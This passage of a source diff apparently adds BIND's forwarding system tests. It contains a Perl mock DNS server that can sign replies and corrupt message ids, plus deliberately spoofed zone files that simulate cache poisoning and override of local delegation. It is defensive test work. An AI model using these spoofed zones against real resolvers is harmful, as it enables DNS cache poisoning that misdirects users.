will add 50 to the message id of the response. + + +use IO::File; +use IO::Socket; +use Data::Dumper; +use Net::DNS; +use Net::DNS::Packet; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +# We default to listening on 10.53.0.2 for historical reasons +# XXX: we should also be able to specify IPv6 +my $server_addr = "10.53.0.6"; +if (@ARGV > 0) { + $server_addr = @ARGV[0]; +} + +my $mainport = int($ENV{'PORT'}); +if (!$mainport) { $mainport = 5300; } +my $ctrlport = int($ENV{'EXTRAPORT1'}); +if (!$ctrlport) { $ctrlport = 5301; } + +print "listening on $server_addr:$mainport,$ctrlport.\n"; +print "Using Net::DNS $Net::DNS::VERSION\n"; + +# XXX: we should also be able to set the port numbers to listen on. +my $ctlsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $ctrlport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "udp", Reuse => 1) or die "$!"; + +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +#my @answers = (); +my @rules; +my $udphandler; +my $tcphandler; + +sub handleUDP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + while (my $rr = $request->pop("additional")) { + $prev_tsig = $rr if ($rr->type eq "TSIG"); + } + + my $r; + my $answers = 0; + my $match; + my $key_name; + my $key_data; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + ($match, $key_name, $key_data) = split(/ /,$pattern); + print "[handleUDP] $match, $key_name, $key_data\n"; + $match =~ tr/\// /; + if ("$qname $qtype" =~ /$match/) { + my $a; + foreach $a (@{$r->{answer}}) { + my $resp; + $resp = new Net::DNS::RR("$qname $a"); + $packet->push("answer", $resp); + ++$answers; + } + last; + } + } + if ($answers eq 0) { + my $soa; + $soa = new Net::DNS::RR("$qname 300 IN SOA . . 0 0 0 0 0"); + $packet->push("authority", $soa) + } + if (defined($key_name) && defined($key_data)) { + my $tsig; + # Sign the packet + print " Signing the response with " . + "$key_name/$key_data\n"; + + if ($Net::DNS::VERSION < 0.69) { + $tsig = Net::DNS::RR->new( + "$key_name TSIG $key_data"); + } else { + $tsig = Net::DNS::RR->new( + name => $key_name, + type => 'TSIG', + key => $key_data); + } + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {} + if ($Net::DNS::VERSION < 0.70); + $packet->{"header"}{"arcount"} += 1 + if ($Net::DNS::VERSION < 0.70); + if (defined($prev_tsig)) { + if ($Net::DNS::VERSION < 0.73) { + my $rmac = pack('n H*', + length($prev_tsig->mac)/2, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } else { + $tsig->request_mac( + $prev_tsig->mac); + } + } + + $packet->sign_tsig($tsig); + } + #$packet->print; + + return $packet->data; +} + +# namelen: +# given a stream of data, reads a DNS-formatted name and returns its +# total length, thus making it possible to skip past it. +sub namelen { + my ($data) = @_; + my $len = 0; + my $label_len = 0; + do { + $label_len = unpack("c", $data); + $data = substr($data, $label_len + 1); + $len += $label_len + 1; + } while ($label_len != 0); + return ($len); +} + +# packetlen: +# given a stream of data, reads a DNS wire-format packet and returns +# its total length, making it possible to skip past it. +sub packetlen { + my ($data) = @_; + my $q; + my $rr; + my $header; + my $offset; + + # + # decode/encode were introduced in Net::DNS 0.68 + # parse is no longer a method and calling it here makes perl croak. + # + my $decode = 0; + $decode = 1 if ($Net::DNS::VERSION >= 0.68); + + if ($decode) { + ($header, $offset) = Net::DNS::Header->decode(\$data); + } else { + ($header, $offset) = Net::DNS::Header->parse(\$data); + } + + for (1 .. $header->qdcount) { + if ($decode) { + ($q, $offset) = + Net::DNS::Question->decode(\$data, $offset); + } else { + ($q, $offset) = + Net::DNS::Question->parse(\$data, $offset); + } + } + for (1 .. $header->ancount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + for (1 .. $header->nscount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + for (1 .. $header->arcount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + return $offset; +} + +# sign_tcp_continuation: +# This is a hack to correct the problem that Net::DNS has no idea how +# to sign multiple-message TCP responses. Several data that are included +# in the digest when signing a query or the first message of a response are +# omitted when signing subsequent messages in a TCP stream. +# +# Net::DNS::Packet->sign_tsig() has the ability to use a custom signing +# function (specified by calling Packet->sign_func()). We use this +# function as the signing function for TCP continuations, and it removes +# the unwanted data from the digest before calling the default sign_hmac +# function. +sub sign_tcp_continuation { + my ($key, $data) = @_; + + # copy out first two bytes: size of the previous MAC + my $rmacsize = unpack("n", $data); + $data = substr($data, 2); + + # copy out previous MAC + my $rmac = substr($data, 0, $rmacsize); + $data = substr($data, $rmacsize); + + # try parsing out the packet information + my $plen = packetlen($data); + my $pdata = substr($data, 0, $plen); + $data = substr($data, $plen); + + # remove the keyname, ttl, class, and algorithm name + $data = substr($data, namelen($data)); + $data = substr($data, 6); + $data = substr($data, namelen($data)); + + # preserve the TSIG data + my $tdata = substr($data, 0, 8); + + # prepare a new digest and sign with it + $data = pack("n", $rmacsize) . $rmac . $pdata . $tdata; + return Net::DNS::RR::TSIG::sign_hmac($key, $data); +} + +sub handleTCP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $opaque; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + my $signer; + my $continuation = 0; + if ($Net::DNS::VERSION < 0.81) { + while (my $rr = $request->pop("additional")) { + if ($rr->type eq "TSIG") { + $prev_tsig = $rr; + } + } + } + + my @results = (); + my $count_these = 0; + + my $r; + my $answers = 0; + my $match; + my $key_name; + my $key_data; + my $tname; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($match, $key_name, $key_data, $tname) = split(/ /,$pattern); + print "[handleTCP] $match, $key_name, $key_data, $tname \n"; + $match =~ tr/\// /; + if ("$qname $qtype" =~ /$match/) { + $count_these++; + my $a; + foreach $a (@{$r->{answer}}) { + my $resp; + $resp = new Net::DNS::RR("$qname $a"); + $packet->push("answer", $resp); + ++$answers; + } + last; + } + } + if ($answers eq 0) { + my $soa; + $soa = new Net::DNS::RR("$qname 300 SOA . . 0 0 0 0 0"); + $packet->push("authority", $soa) + } + if (defined($key_name) && $key_name eq "bad-id") { + $packet->header->id(($id+50)%0xffff); + $key_name = $key_data; + ($key_data, $tname) = split(/ /,$tname) + } + if (defined($key_name) && defined($key_data)) { + my $tsig; + # sign the packet + print " Signing the data with " . + "$key_name/$key_data\n"; + + if ($Net::DNS::VERSION < 0.69) { + $tsig = Net::DNS::RR->new( + "$key_name TSIG $key_data"); + } elsif ($Net::DNS::VERSION >= 0.81 && + $continuation) { + } elsif ($Net::DNS::VERSION >= 0.75 && + $continuation) { + $tsig = $prev_tsig; + } else { + $tsig = Net::DNS::RR->new( + name => $key_name, + type => 'TSIG', + key => $key_data); + } + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {} + if ($Net::DNS::VERSION < 0.70); + $packet->{"header"}{"arcount"} += 1 + if ($Net::DNS::VERSION < 0.70); + if (defined($prev_tsig)) { + if ($Net::DNS::VERSION < 0.73) { + my $rmac = pack('n H*', + length($prev_tsig->mac)/2, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } elsif ($Net::DNS::VERSION < 0.81) { + $tsig->request_mac( + $prev_tsig->mac); + } + } + + $tsig->sign_func($signer) if defined($signer); + $tsig->continuation($continuation) if + ($Net::DNS::VERSION >= 0.71 && + $Net::DNS::VERSION <= 0.74 ); + if ($Net::DNS::VERSION < 0.81) { + $packet->sign_tsig($tsig); + } elsif ($continuation) { + $opaque = $packet->sign_tsig($opaque); + } else { + $opaque = $packet->sign_tsig($request); + } + $signer = \&sign_tcp_continuation + if ($Net::DNS::VERSION < 0.70); + $continuation = 1; + + my $copy = + Net::DNS::Packet->new(\($packet->data)); + $prev_tsig = $copy->pop("additional"); + } + + #$packet->print; + push(@results,$packet->data); + if ($tname eq "") { + $tname = $qname; + } + $packet = new Net::DNS::Packet($tname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + print " A total of $count_these patterns matched\n"; + return \@results; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($ctlsock), 1) = 1; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($ctlsock), 1)) { + warn "ctl conn"; + my $conn = $ctlsock->accept; + my $rule = (); + @rules = (); + while (my $line = $conn->getline) { + chomp $line; + if ($line =~ m!^/(.*)/$!) { + if (length($1) == 0) { + $udphandler = sub { return; }; + $tcphandler = sub { return; }; + } else { + $udphandler = \&handleUDP; + $tcphandler = \&handleTCP; + $rule = { pattern => $1, answer => [] }; + push(@rules, $rule); + } + } else { + push(@{$rule->{answer}}, $line); + } + } + $conn->close; + #print Dumper(@rules); + #print "+=+=+ $rules[0]->{'pattern'}\n"; + #print "+=+=+ $rules[0]->{'answer'}->[0]->{'rname'}\n"; + #print "+=+=+ $rules[0]->{'answer'}->[0]\n"; + } elsif (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + my $result = &$udphandler($buf); + if (defined($result)) { + my $num_chars = $udpsock->send($result); + print " Sent $num_chars bytes via UDP\n"; + } + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + last unless $n == $len; + print "TCP request\n"; + my $result = &$tcphandler($buf); + if (defined($result)) { + foreach my $response (@$result) { + $len = length($response); + $n = $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($response, $len); + print " Sent: $n chars via TCP\n"; + } + } + } + $conn->close; + } +} diff --git a/bin/tests/system/forward/clean.sh b/bin/tests/system/forward/clean.sh new file mode 100644 index 0000000..fad8ec5 --- /dev/null +++ b/bin/tests/system/forward/clean.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after forward tests. +# +rm -f ./ans11/query.log +rm -f ./dig.out.* +rm -f ./*/named.conf +rm -f ./*/named.memstats +rm -f ./*/named.run ./*/named.run.prev +rm -f ./*/named_dump.db +rm -f ./ns*/named.lock +rm -f ./ns*/managed-keys.bind* +rm -f ./ns1/root.db ./ns1/root.db.signed +rm -f ./ns*/trusted.conf +rm -f ./ns1/K* ./ns1/dsset-* diff --git a/bin/tests/system/forward/ns1/diditwork.net.db b/bin/tests/system/forward/ns1/diditwork.net.db new file mode 100644 index 0000000..fd9a46e --- /dev/null +++ b/bin/tests/system/forward/ns1/diditwork.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns + TXT "recursed" +ns A 10.53.0.1 diff --git a/bin/tests/system/forward/ns1/example.db b/bin/tests/system/forward/ns1/example.db new file mode 100644 index 0000000..aac1bef --- /dev/null +++ b/bin/tests/system/forward/ns1/example.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +txt TXT "recursed" diff --git a/bin/tests/system/forward/ns1/named.conf.in b/bin/tests/system/forward/ns1/named.conf.in new file mode 100644 index 0000000..f871fd6 --- /dev/null +++ b/bin/tests/system/forward/ns1/named.conf.in @@ -0,0 +1,87 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + query-source-v6 address fd92:7065:b8e:ffff::1; + notify-source 10.53.0.1; + notify-source-v6 fd92:7065:b8e:ffff::1; + transfer-source 10.53.0.1; + transfer-source-v6 fd92:7065:b8e:ffff::1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { fd92:7065:b8e:ffff::1; }; + recursion no; + dnssec-validation no; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +zone "example1." { + type primary; + file "example.db"; +}; + +zone "example2." { + type primary; + file "example.db"; +}; + +zone "example3." { + type primary; + file "example.db"; +}; + +zone "example4." { + type primary; + file "example.db"; +}; + +zone "example5." { + type primary; + file "example.db"; +}; + +zone "sld.tld" { + type primary; + file "sld.tld.db"; +}; + +/* A forward zone without forwarders. */ +zone "example6" { + type forward; +}; + +zone "diditwork.net" { + type primary; + file "diditwork.net.db"; +}; + +zone "spoofed.net" { + type primary; + file "spoofed.net.db"; +}; + +zone "sub.local.net" { + type primary; + file "sub.local.net.db"; +}; + +zone "net.example.lll" { + type master; + file "net.example.lll"; +}; diff --git a/bin/tests/system/forward/ns1/net.example.lll b/bin/tests/system/forward/ns1/net.example.lll new file mode 100644 index 0000000..ba0804f --- /dev/null +++ b/bin/tests/system/forward/ns1/net.example.lll @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +net.example.lll. SOA . . 0 0 0 0 0 +net.example.lll. NS attackSecureDomain.net. +didItWork.net.example.lll. TXT "if you can see this record the attack worked" diff --git a/bin/tests/system/forward/ns1/root.db.in b/bin/tests/system/forward/ns1/root.db.in new file mode 100644 index 0000000..95ffac3 --- /dev/null +++ b/bin/tests/system/forward/ns1/root.db.in @@ -0,0 +1,36 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 + +example7 NS ns.example7 +ns.example7 A 10.53.0.2 + +tld NS ns.tld +ns.tld A 10.53.0.2 diff --git a/bin/tests/system/forward/ns1/sign.sh b/bin/tests/system/forward/ns1/sign.sh new file mode 100644 index 0000000..cba1918 --- /dev/null +++ b/bin/tests/system/forward/ns1/sign.sh @@ -0,0 +1,34 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +zone=. +infile=root.db.in +zonefile=root.db + +echo_i "ns1/sign.sh" + +ksk=$("$KEYGEN" -q -fk -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +zsk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$ksk.key" "$zsk.key" > "$zonefile" + +"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1 + +# Configure the resolving server with a static key. +keyfile_to_static_ds "$ksk" > trusted.conf +cp trusted.conf ../ns3/trusted.conf diff --git a/bin/tests/system/forward/ns1/sld.tld.db b/bin/tests/system/forward/ns1/sld.tld.db new file mode 100644 index 0000000..f0d4b05 --- /dev/null +++ b/bin/tests/system/forward/ns1/sld.tld.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 +xxx TXT "foo" diff --git a/bin/tests/system/forward/ns1/spoofed.net.db b/bin/tests/system/forward/ns1/spoofed.net.db new file mode 100644 index 0000000..eedc46f --- /dev/null +++ b/bin/tests/system/forward/ns1/spoofed.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 +sub TXT "recursed" diff --git a/bin/tests/system/forward/ns1/sub.local.net.db b/bin/tests/system/forward/ns1/sub.local.net.db new file mode 100644 index 0000000..fd9a46e --- /dev/null +++ b/bin/tests/system/forward/ns1/sub.local.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns + TXT "recursed" +ns A 10.53.0.1 diff --git a/bin/tests/system/forward/ns10/fakenet.zone b/bin/tests/system/forward/ns10/fakenet.zone new file mode 100644 index 0000000..b655a32 --- /dev/null +++ b/bin/tests/system/forward/ns10/fakenet.zone @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +net. SOA . . 0 0 0 0 0 +net. NS attackSecureDomain.net. +attackSecureDomain.net. A 10.53.0.10 +didItWork.net. TXT "if you can see this record the attack worked" +ns.spoofed.net. A 10.53.0.10 diff --git a/bin/tests/system/forward/ns10/fakenet2.zone b/bin/tests/system/forward/ns10/fakenet2.zone new file mode 100644 index 0000000..cd1e6e9 --- /dev/null +++ b/bin/tests/system/forward/ns10/fakenet2.zone @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +net2. SOA . . 0 0 0 0 0 +net2. NS attackSecureDomain.net. +net2. DNAME net.example.lll. diff --git a/bin/tests/system/forward/ns10/fakesublocalnet.zone b/bin/tests/system/forward/ns10/fakesublocalnet.zone new file mode 100644 index 0000000..160b533 --- /dev/null +++ b/bin/tests/system/forward/ns10/fakesublocalnet.zone @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +sub.local.net. SOA . . 0 0 0 0 0 +sub.local.net. NS ns.spoofed.net. +sub.local.net. TXT "if you see this attacker overrode local delegation" diff --git a/bin/tests/system/forward/ns10/fakesublocaltld.zone b/bin/tests/system/forward/ns10/fakesublocaltld.zone new file mode 100644 index 0000000..f78cbc7 --- /dev/null +++ b/bin/tests/system/forward/ns10/fakesublocaltld.zone @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +sub.local.tld. 3600 IN SOA . . 0 0 0 0 0 +sub.local.tld. 3600 IN NS ns.sub.local.tld. +sub.local.tld. 3600 IN TXT bad +ns.sub.local.tld. 3600 IN A 10.53.0.8 diff --git a/bin/tests/system/forward/ns10/named.conf.in b/bin/tests/system/forward/ns10/named.conf.in new file mode 100644 index 0000000..1f318dd --- /dev/null +++ b/bin/tests/system/forward/ns10/named.conf.in @@ -0,0 +1,53 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.10; + notify-source 10.53.0.10; + transfer-source 10.53.0.10; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.10; }; + listen-on-v6 { none; }; + minimal-responses no; +}; + +zone "net." { + type master; + file "fakenet.zone"; +}; + +zone "spoofed.net." { + type master; + file "spoofednet.zone"; +}; + +zone "sub.local.net." { + type master; + file "fakesublocalnet.zone"; +}; + +zone "net2" { + type master; + file "fakenet2.zone"; +}; + +zone "net.example.lll" { + type master; + file "net.example.lll"; +}; + +zone "sub.local.tld." { + type master; + file "fakesublocaltld.zone"; +}; diff --git a/bin/tests/system/forward/ns10/net.example.lll b/bin/tests/system/forward/ns10/net.example.lll new file mode 100644 index 0000000..ba0804f --- /dev/null +++ b/bin/tests/system/forward/ns10/net.example.lll @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +net.example.lll. SOA . . 0 0 0 0 0 +net.example.lll. NS attackSecureDomain.net. +didItWork.net.example.lll. TXT "if you can see this record the attack worked" diff --git a/bin/tests/system/forward/ns10/spoofednet.zone b/bin/tests/system/forward/ns10/spoofednet.zone new file mode 100644 index 0000000..fb70a43 --- /dev/null +++ b/bin/tests/system/forward/ns10/spoofednet.zone @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +spoofed.net. SOA . . 0 0 0 0 0 +spoofed.net. NS ns.spoofed.net. +ns.spoofed.net. A 10.53.0.10 +spoofed.net. TXT "this record is clearly spoofed" diff --git a/bin/tests/system/forward/ns2/example.db b/bin/tests/system/forward/ns2/example.db new file mode 100644 index 0000000..df3e52c --- /dev/null +++ b/bin/tests/system/forward/ns2/example.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +txt TXT "forwarded" diff --git a/bin/tests/system/forward/ns2/named.conf.in b/bin/tests/system/forward/ns2/named.conf.in new file mode 100644 index 0000000..f9a081a --- /dev/null +++ b/bin/tests/system/forward/ns2/named.conf.in @@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + query-source-v6 address fd92:7065:b8e:ffff::2; + notify-source 10.53.0.2; + notify-source-v6 fd92:7065:b8e:ffff::2; + transfer-source 10.53.0.2; + transfer-source-v6 fd92:7065:b8e:ffff::2; + port @PORT@; + pid-file 